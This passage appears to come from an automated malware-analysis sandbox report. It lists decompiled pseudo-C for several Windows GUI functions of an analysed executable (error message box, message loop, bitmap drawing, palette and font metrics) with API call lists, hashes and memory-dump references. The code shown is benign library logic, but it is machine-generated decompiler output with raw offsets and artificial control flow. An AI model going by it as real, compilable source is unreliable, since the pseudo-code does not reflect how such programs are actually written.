					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004042DC, 2,  &_v4, 0);
				}
			}

0x0040425c
0x004042bc
0x004042cc
0x004042cc
0x004042d2
0x0040425e
0x00404267
0x00404277
0x00404277
0x00404293
0x004042b4
0x004042b4

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040431E,?,?,00000000,?,00000001,004043CA,00402C17,00402C5F), ref: 0040428D
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00404293
GetStdHandle.KERNEL32(000000F5,004042DC,00000002,?,00000000,00000000,?,0040431E,?,?,00000000,?,00000001,004043CA,00402C17,00402C5F), ref: 004042A8
WriteFile.KERNEL32(00000000,000000F5,004042DC,00000002,?), ref: 004042AE
MessageBoxA.USER32 ref: 004042CC

Strings

Error, xrefs: 004042C0
Runtime error at 00000000, xrefs: 00404286, 004042C5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: d812b627cafcd32b6163f81e9816f70754a24187308936334d6bcbbb51b05439
Instruction ID: 8bbea50611fc5059121855c55957be573dc5c1fadd068eb649dbc53dda791323
Opcode Fuzzy Hash: d812b627cafcd32b6163f81e9816f70754a24187308936334d6bcbbb51b05439
Instruction Fuzzy Hash: 57F090A1B843007AEA2073D5ACC6F5A36584785B98F6047FFB250B84F2C7FC44C0922E

Uniqueness

Uniqueness Score: -1.00%

Function 0048E7C8, Relevance: 12.2, APIs: 8, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0048E7C8(signed int* __eax, void* __ecx, void* __edi, void* __esi) {
				signed int* _v8;
				intOrPtr _v12;
				char _v40;
				void* __ebx;
				void* __ebp;
				int _t88;
				signed int _t89;
				signed int _t102;
				signed int* _t103;
				void* _t108;
				signed int _t110;
				signed int _t119;
				signed int _t129;
				signed int _t131;
				void* _t133;
				signed int _t137;
				signed int _t142;
				intOrPtr* _t148;
				intOrPtr* _t153;
				MSG* _t160;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr _t184;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr _t193;
				intOrPtr* _t194;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t205;
				intOrPtr _t206;

				_t201 = __esi;
				_t200 = __edi;
				_t203 = _t205;
				_t206 = _t205 + 0xffffffdc;
				_v8 = __eax;
				_t160 =  &_v40;
				_v12 = 0;
				if(_v8[0xa5] != 0) {
					return _v12;
				} else {
					 *((intOrPtr*)( *_v8 + 0x16c))();
					_push(_t203);
					_push(0x48eaee);
					_push( *[fs:edx]);
					 *[fs:edx] = _t206;
					do {
						if(PeekMessageA(_t160, 0, 0, 0, 1) == 0) {
							E0048F634(_v8, _t160, _t160, _t200, _t201, __eflags);
						} else {
							if(_t160->message != 0x7b) {
								L5:
								if((_v8[7] & 0x00000010) == 0) {
									L7:
									if(E0048DFBC(_v8, _t160) == 0) {
										_t88 = _t160->message;
										__eflags = _t88 - 0x100;
										if(_t88 >= 0x100) {
											__eflags = _t88 - 0xb402;
											if(__eflags > 0) {
												_t89 = _t88 - 0xb403;
												__eflags = _t89;
												if(_t89 == 0) {
													_v8[0xbd] =  *((intOrPtr*)( *_v8 + 0x150))();
												} else {
													__eflags = _t89 == 1;
													if(_t89 == 1) {
														_v8[0xbd] =  *((intOrPtr*)( *_v8 + 0x154))();
													} else {
														goto L48;
													}
												}
											} else {
												if(__eflags == 0) {
													E0048DC60(_v8, _t160->lParam);
												} else {
													_t102 = _t88 + 0xffffff00 - 9;
													__eflags = _t102;
													if(_t102 < 0) {
														_t103 = _v8;
														__eflags =  *((char*)(_t103 + 0x248));
														if( *((char*)(_t103 + 0x248)) == 0) {
															 *((intOrPtr*)( *_v8 + 0x138))();
														}
														__eflags = _t160->message - 0x104;
														if(_t160->message != 0x104) {
															L40:
															__eflags = _t160->wParam - 0x70;
															if(_t160->wParam != 0x70) {
																L43:
																 *((intOrPtr*)( *((intOrPtr*)(E0048CF44(_v8[0xac]))) - 0x14))();
															} else {
																_t108 = E0045E5B0();
																_t184 =  *0x48eb04; // 0x4
																__eflags = _t184 - _t108;
																if(_t184 == _t108) {
																	_t110 =  *((intOrPtr*)( *_v8 + 0x104))();
																	__eflags = _t110;
																	if(_t110 == 0) {
																		goto L43;
																	}
																}
															}
														} else {
															__eflags = _t160->wParam - 0x12;
															if(_t160->wParam != 0x12) {
																goto L40;
															} else {
																 *((intOrPtr*)( *_v8 + 0x17c))();
																_v8[0xa2] = 1;
																TranslateMessage(_t160);
																DispatchMessageA(_t160);
															}
														}
													} else {
														_t119 = _t102 + 0xffffff09 - 0xb;
														__eflags = _t119;
														if(_t119 < 0) {
															_t169 =  *_v8;
															 *((intOrPtr*)( *_v8 + 0x178))();
														} else {
															__eflags = _t119 == 0xae16;
															if(_t119 == 0xae16) {
																goto L34;
															} else {
																goto L48;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t88 - 0xa1;
											if(__eflags > 0) {
												_t129 = _t88 - 0xa4;
												__eflags = _t129;
												if(_t129 == 0) {
													goto L34;
												} else {
													__eflags = _t129 == 3;
													if(_t129 == 3) {
														goto L34;
													} else {
														goto L48;
													}
												}
											} else {
												if(__eflags == 0) {
													L34:
													 *((intOrPtr*)( *_v8 + 0x17c))();
													E0048F7FC(_v8[0xb1]);
													DispatchMessageA(_t160);
												} else {
													_t131 = _t88 - 0x10;
													__eflags = _t131;
													if(_t131 == 0) {
														goto L34;
													} else {
														__eflags = _t131 == 0x3d;
														if(_t131 == 0x3d) {
															_t133 = E0045E5B0();
															_t190 =  *0x48eb00; // 0x0
															__eflags = _t190 - _t133;
															if(_t190 == _t133) {
																_t137 = E0048E460(E0048CF44(_v8[0xac]));
																__eflags = _t137;
																if(_t137 != 0) {
																	_t142 =  *(E0048E460(E0048CF44(_v8[0xac])) + 0x64);
																	__eflags = _t142;
																	if(_t142 == 0) {
																		_t148 =  *0x4bb224; // 0x4bcb80
																		_t142 =  *( *((intOrPtr*)( *_t148 + 0x6c)) + 0x158);
																	}
																	_t191 =  *0x4bb224; // 0x4bcb80
																	_t193 =  *((intOrPtr*)( *_t191 + 0x6c));
																	__eflags =  *(_t193 + 0x228) & 0x00000008;
																	if(( *(_t193 + 0x228) & 0x00000008) == 0) {
																		_t194 =  *0x4bb048; // 0x4bcb7c
																		E00467A3C( *_t194, _t160, _t142, _t200, _t201);
																	} else {
																		_t169 = _t142;
																		E00467AC4();
																	}
																}
															}
														} else {
															L48:
															TranslateMessage(_t160);
															DispatchMessageA(_t160);
														}
													}
												}
											}
										}
										E0048D7F4(_v8);
									} else {
										TranslateMessage(_t160);
										DispatchMessageA(_t160);
									}
								} else {
									_t153 =  *0x4bb048; // 0x4bcb7c
									if(E00467060( *_t153, _t169, _t160) == 0) {
										goto L7;
									}
								}
							} else {
								_t177 =  *0x48c75c; // 0x48c7a8
								if(E004037A4(_v8[0xb1], _t177) == 0) {
									goto L5;
								}
							}
						}
					} while (_v8[0xa5] != 0);
					_pop(_t178);
					 *[fs:eax] = _t178;
					return  *((intOrPtr*)( *_v8 + 0x158))(0x48eaf5);
				}
			}

0x0048e7c8
0x0048e7c8
0x0048e7c9
0x0048e7cb
0x0048e7cf
0x0048e7d2
0x0048e7d7
0x0048e7e4
0x0048eafc
0x0048e7ea
0x0048e7ef
0x0048e7f7
0x0048e7f8
0x0048e7fd
0x0048e800
0x0048e803
0x0048e813
0x0048eac0
0x0048e819
0x0048e81d
0x0048e83b
0x0048e842
0x0048e85a
0x0048e866
0x0048e879
0x0048e87c
0x0048e881
0x0048e8bc
0x0048e8c1
0x0048e8f5
0x0048e8f5
0x0048e8fa
0x0048ea9d
0x0048e900
0x0048e900
0x0048e901
0x0048ea84
0x0048e907
0x00000000
0x0048e907
0x0048e901
0x0048e8c3
0x0048e8c3
0x0048ea6c
0x0048e8c9
0x0048e8ce
0x0048e8ce
0x0048e8d1
0x0048e9c9
0x0048e9cc
0x0048e9d3
0x0048e9dc
0x0048e9dc
0x0048e9e2
0x0048e9e9
0x0048ea17
0x0048ea17
0x0048ea1b
0x0048ea3f
0x0048ea52
0x0048ea1d
0x0048ea1d
0x0048ea22
0x0048ea28
0x0048ea2a
0x0048ea35
0x0048ea3b
0x0048ea3d
0x00000000
0x00000000
0x0048ea3d
0x0048ea2a
0x0048e9eb
0x0048e9eb
0x0048e9ef
0x00000000
0x0048e9f1
0x0048e9f6
0x0048e9ff
0x0048ea07
0x0048ea0d
0x0048ea0d
0x0048e9ef
0x0048e8d7
0x0048e8dc
0x0048e8dc
0x0048e8df
0x0048ea5c
0x0048ea5e
0x0048e8e5
0x0048e8e5
0x0048e8ea
0x00000000
0x0048e8f0
0x00000000
0x0048e8f0
0x0048e8ea
0x0048e8df
0x0048e8d1
0x0048e8c3
0x0048e883
0x0048e883
0x0048e888
0x0048e8a3
0x0048e8a3
0x0048e8a8
0x00000000
0x0048e8ae
0x0048e8ae
0x0048e8b1
0x00000000
0x0048e8b7
0x00000000
0x0048e8b7
0x0048e8b1
0x0048e88a
0x0048e88a
0x0048e9a5
0x0048e9aa
0x0048e9b9
0x0048e9bf
0x0048e890
0x0048e890
0x0048e890
0x0048e893
0x00000000
0x0048e899
0x0048e899
0x0048e89c
0x0048e90c
0x0048e911
0x0048e917
0x0048e919
0x0048e92d
0x0048e932
0x0048e934
0x0048e94d
0x0048e950
0x0048e952
0x0048e954
0x0048e95e
0x0048e95e
0x0048e964
0x0048e96c
0x0048e96f
0x0048e976
0x0048e992
0x0048e99b
0x0048e978
0x0048e980
0x0048e988
0x0048e988
0x0048e976
0x0048e934
0x0048e89e
0x0048eaa5
0x0048eaa6
0x0048eaac
0x0048eaac
0x0048e89c
0x0048e893
0x0048e88a
0x0048e888
0x0048eab4
0x0048e868
0x0048e869
0x0048e86f
0x0048e86f
0x0048e844
0x0048e846
0x0048e854
0x00000000
0x00000000
0x0048e854
0x0048e81f
0x0048e828
0x0048e835
0x00000000
0x00000000
0x0048e835
0x0048e81d
0x0048eac8
0x0048ead7
0x0048eada
0x0048eaed
0x0048eaed

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E80C
TranslateMessage.USER32 ref: 0048E869
DispatchMessageA.USER32 ref: 0048E86F
DispatchMessageA.USER32 ref: 0048E9BF
TranslateMessage.USER32 ref: 0048EA07
DispatchMessageA.USER32 ref: 0048EA0D
TranslateMessage.USER32 ref: 0048EAA6
DispatchMessageA.USER32 ref: 0048EAAC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Dispatch$Translate$Peek
String ID:
API String ID: 1308778987-0
Opcode ID: 8d4bd43bda6d412dca720c7a32a38a2b0f34be78a75fe232c367920ec95a1ece
Instruction ID: 69ee7b768b0eae88f949a84d3c3048f74d743dabf59ebc530503d33c9ff2a926
Opcode Fuzzy Hash: 8d4bd43bda6d412dca720c7a32a38a2b0f34be78a75fe232c367920ec95a1ece
Instruction Fuzzy Hash: 4F91A034604104DFDB04FF2AC9C9A9EB7B1BF45304F2489F6E8059B396CB38AE419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00454D44, Relevance: 12.2, APIs: 8, Instructions: 170
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00454D44(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = E00454508(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = E0042D2EC(1);
							 *(_t120 + 0x54) = _t140;
							E0042E778(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E00428C64( *((intOrPtr*)(E0042D8BC( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E0041B1E4(0, _t120,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = E0042D8BC( *(_t120 + 0x54));
						_pop(_t129);
						E00429008(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E004294DC(E0042D8BC( *(_t120 + 0x54))));
						_push(_v8);
						_push(E004546DC(_t120));
						L0042FD10();
						E0041B1E4(_a16, _t120, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = E004294DC(E0042D8BC( *(_t120 + 0x54)));
						E00428C64( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
						_t138 = E004294DC(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E00428C64( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
						_t139 = E004294DC(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(E00454304(_t144));
					E00454D1C(_t120, _t144);
					_push(E00454304(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E004294DC(__ecx));
					_push(_v8);
					_t119 = E004546DC(_t120);
					_push(_t119);
					L0042FD10();
					return _t119;
				}
				return _t46;
			}

0x00454d44
0x00454d4d
0x00454d4f
0x00454d52
0x00454d56
0x00454d5d
0x00454d63
0x00454d67
0x00454dad
0x00454db1
0x00454dbf
0x00454dc1
0x00454dc8
0x00454dd4
0x00454ddc
0x00454dde
0x00454dde
0x00454df1
0x00454e05
0x00454e0d
0x00454e11
0x00454e16
0x00454e17
0x00454e1c
0x00454e1e
0x00454e20
0x00454e22
0x00454e24
0x00454e26
0x00454e28
0x00454e37
0x00454e3b
0x00454e43
0x00454e44
0x00454e60
0x00454e72
0x00454e7d
0x00454e89
0x00454e91
0x00454e99
0x00454ebb
0x00454ebb
0x00454ebe
0x00454ecb
0x00454ed7
0x00454edf
0x00454ee7
0x00000000
0x00454f0a
0x00454d6c
0x00454d75
0x00454d78
0x00454d82
0x00454d83
0x00454d85
0x00454d8a
0x00454d8e
0x00454d96
0x00454d9a
0x00454d9d
0x00454da2
0x00454da3
0x00000000
0x00454da3
0x00454f15

APIs

73F0D9B4.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00454DA3
73F0D9B4.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00454E44
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00454E91
SetBkColor.GDI32(00000000,00000000), ref: 00454E99
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00454EBE

Part of subcall function 00454D1C: 73F14419.COMCTL32(00000000,?,00454D7D,00000000,?), ref: 00454D32

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$F14419Text
String ID:
API String ID: 2727074776-0
Opcode ID: 807a03ec68b9caf503f903fa4b69626018edbb5a0634d31d4e95652873268602
Instruction ID: 6aee7c2f6a2f290e834ff63392f6c7c8bdfb9d0d14efe41ad3481e3154efa7ac
Opcode Fuzzy Hash: 807a03ec68b9caf503f903fa4b69626018edbb5a0634d31d4e95652873268602
Instruction Fuzzy Hash: 65511A71700114AFDB40FF69DD82F9E37A8AF48718F50016AB905EB286CA78ED458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0044B5CC, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044B5CC(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t97;
				struct HDC__* _t98;

				_t98 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00445658(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t97 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0044D590(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0044D590(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t97 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t97 = 0x200f;
				}
				if(_t97 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t98,  &_v36, _v12, _t97);
					E00445658(_t98, _v36.top, _v36.left);
					IntersectClipRect(_t98, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00447F3C(_t82, _t98, 0x14, 0);
				_t86 = _t98;
				E00447F3C(_t82, _t98, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t98, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E0041C834( *((intOrPtr*)(_t82 + 0x19c)), _t86, _v8);
						_t106 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							_t86 =  *(_t66 + 0x40);
							E0044B5CC(_t66,  *(_t66 + 0x40), _t98, _t106,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

0x0044b5d7
0x0044b5d9
0x0044b5db
0x0044b5e7
0x0044b5f1
0x0044b603
0x0044b608
0x0044b60c
0x0044b621
0x0044b63b
0x0044b640
0x0044b645
0x0044b647
0x0044b64e
0x0044b64e
0x0044b623
0x0044b623
0x0044b62a
0x0044b62a
0x0044b655
0x0044b667
0x0044b676
0x0044b683
0x0044b69b
0x0044b69b
0x0044b6ab
0x0044b6b2
0x0044b6bb
0x0044b6c0
0x0044b6c8
0x0044b707
0x0044b70c
0x0044b711
0x0044b71d
0x0044b6ca
0x0044b6cd
0x0044b6d0
0x00000000
0x00000000
0x0044b6d3
0x0044b6d6
0x0044b6dd
0x0044b6e6
0x0044b6eb
0x0044b6ef
0x0044b6f5
0x0044b6fa
0x0044b6fa
0x0044b6ff
0x0044b702
0x0044b702
0x0044b702
0x00000000
0x0044b6dd

APIs

SaveDC.GDI32 ref: 0044B5E2

Part of subcall function 00445658: GetWindowOrgEx.GDI32(?), ref: 00445666
Part of subcall function 00445658: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0044567C

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044B603
GetWindowLongA.USER32(00000000,000000EC), ref: 0044B619
GetWindowLongA.USER32(00000000,000000F0), ref: 0044B63B
SetRect.USER32 ref: 0044B667
DrawEdge.USER32(?,?,?,00000000), ref: 0044B676
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044B69B
RestoreDC.GDI32(?,?), ref: 0044B70C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: ffac7c3a6a42a13a00be538ff204dd346e38d22295f6bb7d0bfcb5dbcce99478
Instruction ID: 699b605686fd7e0bd271cd15a7ee08c5f7261519c5c34d8b3fb60511b0893aa8
Opcode Fuzzy Hash: ffac7c3a6a42a13a00be538ff204dd346e38d22295f6bb7d0bfcb5dbcce99478
Instruction Fuzzy Hash: 55412171B002046BEB10EB99CC81F9E77A9AF45704F11416AFA04EB286DB79DD0187A9

Uniqueness

Uniqueness Score: -1.00%

Function 00429E20, Relevance: 12.1, APIs: 8, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00429E20(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E00402D04(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x429f1d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x429f24);
				return ReleaseDC(0, _v8);
			}

0x00429e21
0x00429e2a
0x00429e33
0x00429e47
0x00429e53
0x00429e58
0x00429e59
0x00429e5e
0x00429e61
0x00429e6f
0x00429e74
0x00429e89
0x00429e98
0x00429eff
0x00429e9a
0x00429ead
0x00429ecb
0x00429edf
0x00429edf
0x00429e98
0x00429f06
0x00429f09
0x00429f0c
0x00429f1c

APIs

GetDC.USER32(00000000), ref: 00429E4E
GetDeviceCaps.GDI32(?,00000068), ref: 00429E6A
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00429E89
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00429EAD
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00429ECB
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00429EDF
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00429EFF
ReleaseDC.USER32(00000000,?), ref: 00429F17

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: e6870f2b988d07a63a19550c66dbd4e99205aba096ac8c6207aa00b79ac302ff
Instruction ID: 6076b100b9e167de9dfbf12bcb866e4c8173b1d9362c72a2a2d81eb729672600
Opcode Fuzzy Hash: e6870f2b988d07a63a19550c66dbd4e99205aba096ac8c6207aa00b79ac302ff
Instruction Fuzzy Hash: 312171B5A40318FADB10DBA5CD81FAE72ACEB08708F5144A6F704F71C1D679AE509B28

Uniqueness

Uniqueness Score: -1.00%

Function 00439510, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00439510(void* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v84;
				signed int _v100;
				void* __ebx;
				void* _t15;
				char* _t20;
				signed int _t21;
				signed int _t23;
				struct HDC__* _t29;
				signed int _t30;
				signed int _t32;
				signed int _t33;
				void* _t34;
				void* _t40;
				struct tagTEXTMETRICA* _t42;

				_t40 = __eax;
				_t29 = GetDC(0);
				GetTextMetricsA(_t29, _t42);
				_t15 = SelectObject(_t29, E004284A4( *((intOrPtr*)(_t40 + 0x68)), _t29, _t34));
				GetTextMetricsA(_t29,  &_v84);
				SelectObject(_t29, _t15);
				ReleaseDC(0, _t29);
				_t20 =  *0x4baf14; // 0x4bcae0
				if( *_t20 == 0) {
					_t30 = _t42->tmHeight;
					_t21 = _v100;
					if(_t30 > _t21) {
						_t30 = _t21;
					}
					_t23 = GetSystemMetrics(6) << 2;
					if(_t30 < 0) {
						_t30 = _t30 + 3;
					}
					_t32 = _t23 + (_t30 >> 2);
				} else {
					if( *((char*)(_t40 + 0x1a5)) == 0) {
						_t33 = 6;
					} else {
						_t33 = 8;
					}
					_t32 = GetSystemMetrics(6) * _t33;
				}
				return E004464FC(_t40, _v100 + _t32);
			}

0x00439516
0x0043951f
0x00439523
0x00439532
0x0043953f
0x00439546
0x0043954e
0x00439553
0x0043955b
0x0043957f
0x00439582
0x00439588
0x0043958a
0x0043958a
0x00439593
0x00439598
0x0043959a
0x0043959a
0x004395a2
0x0043955d
0x00439564
0x0043956d
0x00439566
0x00439566
0x00439566
0x0043957b
0x0043957b
0x004395b7

APIs

GetDC.USER32(00000000), ref: 0043951A
GetTextMetricsA.GDI32(00000000), ref: 00439523

Part of subcall function 004284A4: CreateFontIndirectA.GDI32(?), ref: 004285E2

SelectObject.GDI32(00000000,00000000), ref: 00439532
GetTextMetricsA.GDI32(00000000,?), ref: 0043953F
SelectObject.GDI32(00000000,00000000), ref: 00439546
ReleaseDC.USER32(00000000,00000000), ref: 0043954E
GetSystemMetrics.USER32 ref: 00439574
GetSystemMetrics.USER32 ref: 0043958E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
String ID:
API String ID: 1583807278-0
